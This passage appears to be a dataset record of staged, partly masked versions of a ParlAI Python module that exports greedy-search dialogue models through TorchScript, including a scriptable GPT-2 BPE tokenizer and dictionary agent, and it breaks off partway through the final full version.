FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = 
self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list 
of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. 
Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in 
self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-4": "<mask token>\n\n\nclass TorchScriptGreedySearch(nn.Module):\n <mask token>\n <mask token>\n\n def __init__(self, agent: TorchAgent):\n super().__init__()\n self.is_bart = agent.opt['model'] == 'bart'\n for key, val in self.CAIRAOKE_DICT_PARAMS.items():\n assert agent.opt.get(key, val\n ) == val, f'The only currently supported value of \"{key}\" is {val}!'\n orig_dict: DictionaryAgent = agent.dict\n orig_bpe: Gpt2BpeHelper = orig_dict.bpe\n assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())\n assert not any(i for key in orig_bpe.bpe_ranks.keys() for i in key if\n '\\n' in i\n ), \"We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!\"\n fused_key_bpe_ranks = {'\\n'.join(key): float(val) for key, val in\n orig_bpe.bpe_ranks.items()}\n self.dict = ScriptableDictionaryAgent(null_token=orig_dict.\n null_token, end_token=orig_dict.end_token, unk_token=orig_dict.\n unk_token, start_token=orig_dict.start_token, freq=orig_dict.\n freq, tok2ind=orig_dict.tok2ind, ind2tok=orig_dict.ind2tok,\n bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],\n bpe_encoder=orig_bpe.encoder, bpe_byte_encoder=orig_bpe.\n byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=agent._get_special_tokens())\n self.delimiter_tok = agent.history.delimiter_tok\n self.history_size = agent.opt['history_size']\n if agent.opt.get('history_add_global_end_token', None) is not None:\n self.global_end_token = agent.dict[agent.dict.end_token]\n else:\n self.global_end_token = None\n self.text_truncate = agent.opt.get('text_truncate') or agent.opt[\n 'truncate']\n self.text_truncate = (self.text_truncate if self.text_truncate >= 0\n else None)\n self.start_idx = agent.model.START_IDX\n self.end_idx = agent.model.END_IDX\n self.null_idx = agent.model.NULL_IDX\n if self.is_bart:\n self.initial_decoder_input = [self.end_idx, 
self.start_idx]\n else:\n self.initial_decoder_input = [self.start_idx]\n agent.model.eval()\n wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)\n wrapped_model = ModelIncrStateFlattener(agent.model)\n sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)\n encoder_states = agent.model.encoder(sample_tokens)\n initial_generations = self._get_initial_decoder_input(sample_tokens)\n latent, initial_incr_state = wrapped_decoder(initial_generations,\n encoder_states)\n logits = agent.model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}\n incr_state = wrapped_model.reorder_decoder_incremental_state(incr_state\n , torch.tensor([0], dtype=torch.long, device=sample_tokens.device))\n generations = torch.cat([initial_generations, preds], dim=1)\n self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)\n self.decoder_first_pass = torch.jit.trace(wrapped_decoder, (\n initial_generations, encoder_states), strict=False)\n self.partially_traced_model = torch.jit.trace_module(wrapped_model,\n {'output': latent[:, -1:, :],\n 'reorder_decoder_incremental_state': (initial_incr_state, torch\n .tensor([0], dtype=torch.long, device=sample_tokens.device))},\n strict=False)\n self.decoder_later_pass = torch.jit.trace(wrapped_decoder, (\n generations, encoder_states, incr_state), strict=False)\n <mask token>\n <mask token>\n <mask token>\n\n def forward(self, context: str, max_len: int=128) ->str:\n history_vecs: List[List[int]] = []\n context_lines = context.split('\\n')\n if self.history_size > 0:\n context_lines = context_lines[-self.history_size:]\n for line in context_lines:\n history_vecs.append(self.parse(line))\n text_vecs: List[List[int]] = []\n for vec in history_vecs[:-1]:\n text_vecs += [vec]\n text_vecs += [self.delimiter_tok]\n text_vecs += [history_vecs[-1]]\n if self.global_end_token is not None:\n text_vecs += [[self.global_end_token]]\n 
flattened_text_vec: List[int] = []\n for vec in text_vecs:\n for token in vec:\n flattened_text_vec.append(token)\n if self.text_truncate is not None:\n if self.is_bart:\n truncate_length = self.text_truncate - 2\n else:\n truncate_length = self.text_truncate\n if len(flattened_text_vec) > truncate_length:\n flattened_text_vec = flattened_text_vec[-truncate_length:]\n flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)\n if self.is_bart:\n flattened_text_vec = torch.cat([torch.tensor([self.start_idx],\n dtype=torch.long), flattened_text_vec, torch.tensor([self.\n end_idx], dtype=torch.long)], dim=0)\n batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0)\n encoder_states = self.encoder(batch_text_vec)\n generations = self._get_initial_decoder_input(batch_text_vec)\n seen_end = torch.zeros(batch_text_vec.size(0), device=\n batch_text_vec.device, dtype=torch.bool)\n incr_state: Dict[str, torch.Tensor] = {}\n for token_idx in range(max_len):\n if token_idx == 0:\n latent, incr_state = self.decoder_first_pass(generations,\n encoder_states)\n else:\n latent, incr_state = self.decoder_later_pass(generations,\n encoder_states, incr_state)\n logits = self.partially_traced_model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = (self.partially_traced_model.\n reorder_decoder_incremental_state(incr_state, torch.tensor(\n [0], dtype=torch.long, device=batch_text_vec.device)))\n seen_end = seen_end + (preds == self.end_idx).squeeze(1)\n generations = torch.cat([generations, preds], dim=1)\n if torch.all(seen_end):\n break\n if self.is_bart:\n assert generations[0, 0].item() == self.end_idx\n generations = generations[:, 1:]\n generation_tokens: List[int] = generations[0].tolist()\n label = self._v2t(generation_tokens)\n return label\n\n\nclass BaseIncrStateFlattener(nn.Module):\n \"\"\"\n Flatten/unflatten the incremental state for use with TorchScripting.\n\n Typically, the incremental state will be stored as a Dict[int, 
Dict[str, Dict[str,\n torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,\n and previous key/value/mask, respectively. However, TorchScript expects dicts to be\n of type Dict[str, torch.Tensor], and thus all input incremental states when\n TorchScripting will have to be of that type. We thus unflatten the input incremental\n state, already of type Dict[str, torch.Tensor], to pass it into whatever method\n needs it, and we flatten it again after the updated incremental state is passed back\n out.\n\n This is a base class that provides methods for flattening/unflattening: subclasses\n will call these methods as the incremental state is passed into and out of their own\n methods.\n \"\"\"\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n\n def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]\n ) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:\n \"\"\"\n Unflatten the input incremental state.\n\n For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in\n structured_incr_state[0]['self_attn']['prev_key'].\n \"\"\"\n structured_incr_state = defaultdict(lambda : defaultdict(dict))\n for key, state in flat_incr_state.items():\n layer_idx_str, attn_type, state_type = key.split('__')\n structured_incr_state[int(layer_idx_str)][attn_type][state_type\n ] = state\n return dict({k: dict(v) for k, v in structured_incr_state.items()})\n\n def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,\n Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n 
flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.\n Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.\n Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(input=\n input_, encoder_state=encoder_state, incr_state=\n structured_incr_state)\n new_flat_incr_state = self._flatten_incr_state(\n new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). 
We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! 
***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in 
self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = 
self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list 
of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. 
Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in 
self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-5": "#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom collections import defaultdict\nfrom typing import List, Dict, Optional, Tuple\n\nimport torch.jit\nfrom torch import nn as nn\n\nfrom parlai.core.dict import DictionaryAgent\nfrom parlai.core.torch_agent import TorchAgent\nfrom parlai.utils.bpe import Gpt2BpeHelper\n\n\nclass TorchScriptGreedySearch(nn.Module):\n \"\"\"\n A helper class for exporting simple greedy-search models via TorchScript.\n\n Models with extra inputs will need to override to include more variables.\n \"\"\"\n\n # We currently only support these specific dictionary settings\n CAIRAOKE_DICT_PARAMS = {\n \"dict_class\": \"parlai.core.dict:DictionaryAgent\",\n \"dict_initpath\": None,\n \"dict_language\": \"english\",\n \"dict_max_ngram_size\": -1,\n \"dict_minfreq\": 0,\n \"dict_maxtokens\": -1,\n \"dict_tokenizer\": \"gpt2\",\n \"dict_lower\": False,\n \"dict_textfields\": \"text,labels\",\n \"dict_loaded\": True,\n 'bpe_debug': False,\n }\n\n def __init__(self, agent: TorchAgent):\n super().__init__()\n\n self.is_bart = agent.opt['model'] == 'bart'\n\n # Dictionary/tokenization setup\n for key, val in self.CAIRAOKE_DICT_PARAMS.items():\n assert (\n agent.opt.get(key, val) == val\n ), f'The only currently supported value of \"{key}\" is {val}!'\n orig_dict: DictionaryAgent = agent.dict\n orig_bpe: Gpt2BpeHelper = orig_dict.bpe\n assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())\n assert not any(\n i for key in orig_bpe.bpe_ranks.keys() for i in key if '\\n' in i\n ), \"We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!\"\n fused_key_bpe_ranks = {\n '\\n'.join(key): float(val) for key, val in orig_bpe.bpe_ranks.items()\n 
}\n # Cast the values as floats to be able to compare to float('inf') when doing BPE\n # splitting\n self.dict = ScriptableDictionaryAgent(\n null_token=orig_dict.null_token,\n end_token=orig_dict.end_token,\n unk_token=orig_dict.unk_token,\n start_token=orig_dict.start_token,\n freq=orig_dict.freq,\n tok2ind=orig_dict.tok2ind,\n ind2tok=orig_dict.ind2tok,\n bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],\n bpe_encoder=orig_bpe.encoder,\n bpe_byte_encoder=orig_bpe.byte_encoder,\n fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=agent._get_special_tokens(),\n )\n\n # History tracking and start/end tokens\n self.delimiter_tok = agent.history.delimiter_tok\n self.history_size = agent.opt['history_size']\n if agent.opt.get('history_add_global_end_token', None) is not None:\n self.global_end_token = agent.dict[agent.dict.end_token]\n else:\n self.global_end_token = None\n self.text_truncate = agent.opt.get('text_truncate') or agent.opt['truncate']\n self.text_truncate = self.text_truncate if self.text_truncate >= 0 else None\n\n self.start_idx = agent.model.START_IDX\n self.end_idx = agent.model.END_IDX\n self.null_idx = agent.model.NULL_IDX\n if self.is_bart:\n self.initial_decoder_input = [self.end_idx, self.start_idx]\n else:\n self.initial_decoder_input = [self.start_idx]\n\n agent.model.eval()\n\n # Create versions of the model and decoder that will flatten the incremental\n # state dict, as required by TorchScript\n wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)\n wrapped_model = ModelIncrStateFlattener(agent.model)\n\n # Create sample inputs for tracing\n sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)\n encoder_states = agent.model.encoder(sample_tokens)\n initial_generations = self._get_initial_decoder_input(sample_tokens)\n latent, initial_incr_state = wrapped_decoder(\n initial_generations, encoder_states\n )\n logits = agent.model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = {k: 
